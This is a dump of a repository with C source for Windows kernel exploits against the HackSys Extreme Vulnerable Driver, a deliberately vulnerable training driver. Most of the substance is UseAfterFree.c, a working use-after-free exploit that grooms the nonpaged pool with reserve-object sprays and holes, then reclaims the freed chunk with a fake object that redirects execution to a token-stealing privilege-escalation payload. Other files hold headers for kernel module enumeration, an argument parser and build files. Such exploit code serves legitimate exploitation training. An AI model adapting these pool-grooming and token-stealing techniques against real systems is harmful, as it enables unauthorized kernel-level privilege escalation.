35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Uninitialized Heap Variable Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_HEAP_VARIABLE_H__
52 | #define __UNINITIALIZED_HEAP_VARIABLE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// Thread entry point (CreateThread signature) for the Uninitialized Heap
// Variable exploit implemented in UninitializedHeapVariable.c.
DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter);
59 |
60 | #endif //__UNINITIALIZED_HEAP_VARIABLE_H__
61 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UninitializedStackVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see http://www.gnu.org/licenses/.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedStackVariable.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Uninitialized Stack Variable Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_STACK_VARIABLE_H__
52 | #define __UNINITIALIZED_STACK_VARIABLE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// Presumably resolves the kernel/ntdll APIs the exploit needs (the definition
// is not in this header). Note the empty parentheses: in C that means
// "unspecified arguments", not "no arguments" — (VOID) would give a real prototype.
VOID ResolveKernelAPIs();
// Thread entry point (CreateThread signature) for the Uninitialized Stack
// Variable exploit.
DWORD WINAPI UninitializedStackVariableThread(LPVOID Parameter);
60 |
61 | #endif //__UNINITIALIZED_STACK_VARIABLE_H__
62 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UseAfterFree.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see http://www.gnu.org/licenses/.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UseAfterFree.c
43 |
44 | Abstract:
45 | This module implements the exploit for Use After Free
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "UseAfterFree.h"
52 |
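/*
 * Sprays the nonpaged pool with reserve objects.
 *
 * Resolves NtAllocateReserveObject from ntdll.dll into the file-level
 * function pointer, then allocates an IO_COMPLETION_OBJECT reserve object
 * into every slot of ReserveObjectArrayA and, after that, every slot of
 * ReserveObjectArrayB. CreateHolesInNonPagedPoolByClosingReserveObjects and
 * FreeReserveObjects release them again.
 *
 * Any failure (ntdll not loadable, export missing, allocation refused)
 * terminates the process via exit(EXIT_FAILURE). Nt* calls do not set the
 * Win32 last-error value, so the NTSTATUS itself is logged on failure.
 */
VOID SprayNonPagedPoolWithReserveObjects() {
    UINT32 i = 0;
    HMODULE hModule = NULL;
    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
    // Loop bounds are derived from the array definitions so they cannot drift
    // from the sizes declared in UseAfterFree.h.
    const UINT32 CountA = (UINT32)(sizeof(ReserveObjectArrayA) / sizeof(ReserveObjectArrayA[0]));
    const UINT32 CountB = (UINT32)(sizeof(ReserveObjectArrayB) / sizeof(ReserveObjectArrayB[0]));

    // The module reference is never released; harmless, since ntdll.dll
    // stays mapped for the life of the process.
    hModule = LoadLibraryA("ntdll.dll");

    if (!hModule) {
        DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(hModule, "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {
        DEBUG_ERROR("\t\t[-] Failed Resolving NtAllocateReserveObject: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    RtlZeroMemory(ReserveObjectArrayA, sizeof(ReserveObjectArrayA));
    RtlZeroMemory(ReserveObjectArrayB, sizeof(ReserveObjectArrayB));

    for (i = 0; i < CountA; i++) {
        NtStatus = NtAllocateReserveObject(&ReserveObjectArrayA[i], 0, IO_COMPLETION_OBJECT);

        if (NtStatus != STATUS_SUCCESS) {
            DEBUG_ERROR("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", NtStatus);
            exit(EXIT_FAILURE);
        }
    }

    for (i = 0; i < CountB; i++) {
        NtStatus = NtAllocateReserveObject(&ReserveObjectArrayB[i], 0, IO_COMPLETION_OBJECT);

        if (NtStatus != STATUS_SUCCESS) {
            DEBUG_ERROR("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", NtStatus);
            exit(EXIT_FAILURE);
        }
    }
}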
93 |
/*
 * Closes the reserve-object handles at the even indices of
 * ReserveObjectArrayB (0, 2, 4, ...), releasing every other object of the
 * second spray batch. The intent, per the name, is to leave freed chunks in
 * the nonpaged pool for the driver's UaF object to land in.
 * The process exits on the first CloseHandle failure.
 */
VOID CreateHolesInNonPagedPoolByClosingReserveObjects() {
    UINT32 Slot = 0;

    while (Slot < 5000) {
        HANDLE Reserve = ReserveObjectArrayB[Slot];

        if (CloseHandle(Reserve) == FALSE) {
            DEBUG_ERROR("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        Slot += 2;
    }
}
104 |
/*
 * Closes Handles[First], Handles[First + Step], ... for every index below
 * Count, in ascending order. Terminates the process on the first CloseHandle
 * failure, logging the Win32 error.
 */
static VOID CloseHandleStride(HANDLE *Handles, UINT32 First, UINT32 Count, UINT32 Step) {
    UINT32 Index;

    for (Index = First; Index < Count; Index += Step) {
        if (!CloseHandle(Handles[Index])) {
            DEBUG_ERROR("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
    }
}

/*
 * Releases the reserve-object spray: every handle in ReserveObjectArrayA,
 * then the odd-indexed handles of ReserveObjectArrayB (the even ones were
 * already closed by CreateHolesInNonPagedPoolByClosingReserveObjects).
 * Exits the process if any CloseHandle fails.
 */
VOID FreeReserveObjects() {
    CloseHandleStride(ReserveObjectArrayA, 0, 10000, 1);
    CloseHandleStride(ReserveObjectArrayB, 1, 5000, 2);
}
122 |
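/*
 * Sends one IOCTL with no output buffer through the device handle,
 * bracketing the call with the "Kernel Mode" markers used throughout the
 * exploit so kernel-debugger output can be lined up with the user-mode log.
 *
 * Returns DeviceIoControl's result; on failure the Win32 error is logged
 * under Description.
 */
static BOOL SendUafIoctl(HANDLE hFile, DWORD IoControlCode, LPVOID Input, DWORD InputLength, LPCSTR Description) {
    ULONG BytesReturned = 0;
    BOOL Succeeded = FALSE;

    OutputDebugString("****************Kernel Mode****************\n");

    Succeeded = DeviceIoControl(hFile,
                                IoControlCode,
                                Input,
                                InputLength,
                                NULL,
                                0,
                                &BytesReturned,
                                NULL);

    OutputDebugString("****************Kernel Mode****************\n");

    if (!Succeeded) {
        DEBUG_ERROR("\t\t\t[-] %s Failed: 0x%X\n", Description, GetLastError());
    }

    return Succeeded;
}

/*
 * Exploit thread for the HEVD Use-After-Free vulnerability.
 *
 * Sequence:
 *   1. open the device and build a FAKE_OBJECT whose first ULONG is the EoP
 *      payload address (32-bit only: the pointer is cast to ULONG);
 *   2. spray the nonpaged pool with reserve objects and punch holes in it;
 *   3. ask the driver to allocate and then free its UaF object;
 *   4. send FAKE_OBJECT allocations 0x1000 times so that one of them is
 *      expected to reuse the freed chunk;
 *   5. release the spray and trigger the dangling use.
 *
 * Parameter: unused thread argument (CreateThread signature).
 * Returns EXIT_SUCCESS when the allocate, free and use IOCTLs were all
 * accepted, EXIT_FAILURE when one of them was rejected (the use is skipped
 * in that case). Fatal setup errors (no device handle, no memory, spray
 * failure, unhandled exception) terminate the process via exit().
 */
DWORD WINAPI UseAfterFreeThread(LPVOID Parameter) {
    UINT32 i = 0;
    UINT32 FailedFills = 0;
    const UINT32 FillCount = 0x1000;
    BOOL Ok = FALSE;
    DWORD Result = EXIT_SUCCESS;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    ULONG BytesReturned = 0;
    PFAKE_OBJECT FakeObject = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PVOID EopPayload = &TokenStealingPayloadWin7Generic;

    (void)Parameter;

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // Best effort: a failed priority bump is logged but not fatal.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            // %p: a HANDLE is pointer-sized, %X only matches it on x86.
            DEBUG_INFO("\t\t[+] Device Handle: 0x%p\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
        DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

        // Allocate the Heap chunk
        FakeObject = (PFAKE_OBJECT)HeapAlloc(GetProcessHeap(),
                                             HEAP_ZERO_MEMORY,
                                             sizeof(FAKE_OBJECT));

        if (!FakeObject) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", FakeObject);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", (ULONG)sizeof(FAKE_OBJECT));
        }

        DEBUG_INFO("\t\t[+] Preparing FAKE_OBJECT structure\n");

        // Filler bytes, NUL-terminated, with the payload address in the first
        // ULONG; presumably the driver's stale pointer calls through that word —
        // confirm against the driver source. The ULONG cast truncates on x64,
        // so this build is 32-bit only.
        RtlFillMemory((PVOID)FakeObject, sizeof(FAKE_OBJECT), 0x41);
        FakeObject->buffer[sizeof(FakeObject->buffer) - 1] = '\0';
        *(PULONG)FakeObject = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] FakeObject Value: 0x%08X\n", *(PULONG)FakeObject);
        DEBUG_INFO("\t\t\t[+] FakeObject Address: 0x%p\n", FakeObject);
        DEBUG_INFO("\t\t\t[+] FAKE_OBJECT Size: 0x%X\n", (ULONG)sizeof(FAKE_OBJECT));
        DEBUG_INFO("\t\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_INFO("\t\t[+] Preparing NonPaged Kernel Pool Layout\n");
        DEBUG_INFO("\t\t\t[+] Spraying With Reserve Objects\n");

        SprayNonPagedPoolWithReserveObjects();

        DEBUG_INFO("\t\t\t[+] Creating Holes\n");

        CreateHolesInNonPagedPoolByClosingReserveObjects();

        DEBUG_INFO("\t\t[+] Working With Vulnerable UaF Object In NonPaged Pool\n");
        DEBUG_INFO("\t\t\t[+] Allocating UaF Object\n");

        Ok = SendUafIoctl(hFile, HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT, NULL, 0, "Allocate UaF Object");

        if (Ok) {
            DEBUG_INFO("\t\t\t[+] Freeing UaF Object\n");
            Ok = SendUafIoctl(hFile, HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT, NULL, 0, "Free UaF Object");
        }

        if (Ok) {
            // Allocate the FAKE_OBJECT multiple times to take up the freed memory chunk
            DEBUG_INFO("\t\t\t[+] Filling Freed Chunks\n");

            OutputDebugString("****************Kernel Mode****************\n");

            for (i = 0; i < FillCount; i++) {
                // Input length is deliberately left at 0: the driver reads the
                // buffer by its own size (presumably METHOD_NEITHER, where the
                // I/O manager ignores this length) — confirm against the driver.
                if (!DeviceIoControl(hFile,
                                     HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT,
                                     (LPVOID)FakeObject,
                                     0,
                                     NULL,
                                     0,
                                     &BytesReturned,
                                     NULL)) {
                    FailedFills++;
                }
            }

            OutputDebugString("****************Kernel Mode****************\n");

            if (FailedFills != 0) {
                DEBUG_ERROR("\t\t\t[-] %u Of %u Fake Object Allocations Failed\n", FailedFills, FillCount);
            }
        }

        // Always release the spray, even after a failed IOCTL, so the 15000
        // reserve-object handles do not linger until process exit.
        DEBUG_INFO("\t\t\t[+] Freeing Reserve Objects\n");

        FreeReserveObjects();

        // Only trigger the use when allocate and free both succeeded;
        // otherwise there is no freed chunk for a fake object to have reused.
        if (Ok) {
            DEBUG_MESSAGE("\t[+] Triggering Kernel Use After Free\n");
            Ok = SendUafIoctl(hFile, HACKSYS_EVD_IOCTL_USE_UAF_OBJECT, NULL, 0, "Use UaF Object");
        }

        HeapFree(GetProcessHeap(), 0, (LPVOID)FakeObject);
        FakeObject = NULL;

        // Release the device handle instead of leaking it for the process lifetime.
        CloseHandle(hFile);
        hFile = INVALID_HANDLE_VALUE;

        if (!Ok) {
            Result = EXIT_FAILURE;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() does not carry the exception code; GetExceptionCode() does.
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetExceptionCode());
        exit(EXIT_FAILURE);
    }

    return Result;
}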
275 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UseAfterFree.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see http://www.gnu.org/licenses/.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UseAfterFree.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Use After Free Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __USE_AFTER_FREE_H__
52 | #define __USE_AFTER_FREE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// Reserve-object type passed as the third argument of NtAllocateReserveObject
// by SprayNonPagedPoolWithReserveObjects.
#define IO_COMPLETION_OBJECT 1

// User-mode buffer handed to HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT. The
// exploit fills it with 0x41, NUL-terminates it and overwrites the first
// ULONG with the EoP payload address. The 0x58-byte size is presumably chosen
// to match the driver's UaF object allocation so a fake object can reuse the
// freed chunk — confirm against the driver source.
typedef struct _FAKE_OBJECT {
    CHAR buffer[0x58];
} FAKE_OBJECT, *PFAKE_OBJECT;

// Handle tables for the nonpaged-pool spray. A is closed wholesale by
// FreeReserveObjects; B is closed at even indices by
// CreateHolesInNonPagedPoolByClosingReserveObjects and at odd indices by
// FreeReserveObjects.
// NOTE(review): these are definitions, not extern declarations. If more than
// one translation unit includes this header, each gets its own tentative
// definition and the build relies on the C linker merging them; defining
// them once in UseAfterFree.c and declaring them extern here would be cleaner.
HANDLE ReserveObjectArrayA[10000];
HANDLE ReserveObjectArrayB[5000];

VOID FreeReserveObjects();
VOID SprayNonPagedPoolWithReserveObjects();
// Thread entry point (CreateThread signature); Parameter is not used by the
// implementation in UseAfterFree.c.
DWORD WINAPI UseAfterFreeThread(LPVOID Parameter);
VOID CreateHolesInNonPagedPoolByClosingReserveObjects();
71 |
72 | #endif //__USE_AFTER_FREE_H__
73 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/arg.h:
--------------------------------------------------------------------------------
#ifndef __ARG_H__
#define __ARG_H__

/*
 * Minimal command-line option parsing macros (suckless-style arg.h).
 *
 * Typical use inside main(int argc, char *argv[]):
 *
 *     ARGBEGIN {
 *     case 'v': verbose = 1; break;
 *     case 'o': outfile = EARGF(usage()); break;
 *     default:  usage();
 *     } ARGEND
 *
 * ARGBEGIN stores argv[0] in argv0 and then walks each leading argument that
 * starts with '-' and has at least one more character; a bare "--" stops
 * option parsing and is itself skipped. Bundled flags ("-abc") are walked one
 * character at a time by the inner loop until ARGF/EARGF consumes the rest of
 * the word (brk) or the argument pointer has moved on. After ARGEND, argc and
 * argv describe only the remaining non-option arguments.
 *
 * The including file must define `char *argv0;` in exactly one translation
 * unit, and must make abort() available (stdlib.h) because EARGF calls it.
 */
extern char *argv0;

/* Marks x as deliberately unused (silences unused-variable warnings). */
#define USED(x) ((void)(x))

/* Opens the option loop; must be paired with ARGEND and followed by a
 * switch-style block of `case 'x':` labels. Declares _argc (the flag
 * character being handled), _argv (which argument the inner loop started on,
 * so the loop ends once EARGF/ARGF advanced argv) and brk (set by ARGF/EARGF
 * to stop scanning the current word). */
#define ARGBEGIN for (argv0 = *argv, argv++, argc--;\
                      argv[0] && argv[0][1]\
                      && argv[0][0] == '-';\
                      argc--, argv++) {\
                     char _argc;\
                     char **_argv;\
                     int brk;\
                     if (argv[0][1] == '-' && argv[0][2] == '\0') {\
                         argv++;\
                         argc--;\
                         break;\
                     }\
                     for (brk = 0, argv[0]++, _argv = argv;\
                          argv[0][0] && !brk;\
                          argv[0]++) {\
                         if (_argv != argv)\
                             break;\
                         _argc = argv[0][0];\
                         switch (_argc)

/* Closes the inner flag loop and the outer argument loop opened by ARGBEGIN. */
#define ARGEND }\
                 USED(_argc);\
               }\
               USED(argv);\
               USED(argc);

/* The flag character currently being handled (a char); valid only between
 * ARGBEGIN and ARGEND. */
#define ARGC() _argc

/* Yields the current flag's argument: the remainder of the word ("-ofile")
 * or, when the flag ends the word, the next argv element ("-o file"), which
 * is consumed from argc/argv. If neither exists, evaluates x (normally a
 * usage() call) and then abort()s, so x need not return. Sets brk so the
 * inner loop stops scanning this word. */
#define EARGF(x) ((argv[0][1] == '\0' && argv[1] == NULL)?\
                  ((x), abort(), (char *)0) :\
                  (brk = 1, (argv[0][1] != '\0')?\
                  (&argv[0][1]) :\
                  (argc--, argv++, argv[0])))

/* Same as EARGF but yields NULL instead of aborting when no argument is
 * available. */
#define ARGF() ((argv[0][1] == '\0' && argv[1] == NULL)?\
                (char *)0 :\
                (brk = 1, (argv[0][1] != '\0')?\
                (&argv[0][1]) :\
                (argc--, argv++, argv[0])))

#endif //__ARG_H__
49 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ipch/hacksysevdexploit-6f66b5a3/hacksysevdexploit-e885ecc0.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/ipch/hacksysevdexploit-6f66b5a3/hacksysevdexploit-e885ecc0.ipch
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/README.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/README.txt
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Stop_by_win10", "Stop_by_win10\Stop_by_win10.vcxproj", "{680F7C84-6509-4642-93B3-FE631C50EA12}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|Win32.Build.0 = Debug|Win32
16 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|x64.ActiveCfg = Debug|x64
17 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Debug|x64.Build.0 = Debug|x64
18 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|Win32.ActiveCfg = Release|Win32
19 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|Win32.Build.0 = Release|Win32
20 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|x64.ActiveCfg = Release|x64
21 | {680F7C84-6509-4642-93B3-FE631C50EA12}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10.suo
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/HEVD_Stop_By_Win10.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
5 | //extern "C" void Int_3();
6 |
/*
 * Subset of the SYSTEM_INFORMATION_CLASS values accepted by
 * NtQuerySystemInformation.  The numeric values are pinned explicitly
 * because the real enumeration is dense and only a few members are listed
 * here.  SystemModuleInformation (11) presumably fills the
 * SYSTEM_MODULE_INFORMATION buffer declared below (loaded kernel modules
 * and their ImageBase).
 * NOTE(review): newer Windows versions restrict the kernel addresses
 * returned by this class to callers above low integrity — confirm on the
 * target build before relying on it for the ntoskrnl base.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemProcessInformation = 5,
    SystemProcessorPerformanceInformation = 8,
    SystemModuleInformation = 11,
    SystemInterruptInformation = 23,
    SystemExceptionInformation = 33,
    SystemRegistryQuotaInformation = 37,
    SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
19 |
/*
 * One loaded kernel module as reported for SystemModuleInformation.
 * ImageBase is the module's kernel-mode load address; FullPathName is a
 * fixed 256-byte ANSI path and OffsetToFileName presumably indexes the
 * file-name part inside it.  Section and the two base pointers are
 * pointer-sized, so sizeof() differs between the x86 and x64 builds of
 * this project — never hard-code the entry stride.
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
32 |
/*
 * Header of the SystemModuleInformation buffer.  Module[1] is only a
 * placeholder for a variable-length array: the real buffer holds
 * NumberOfModules entries, so the caller must allocate it from the
 * ReturnLength reported by NtQuerySystemInformation and bound any loop
 * by NumberOfModules, not by sizeof(Module).
 */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG NumberOfModules;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
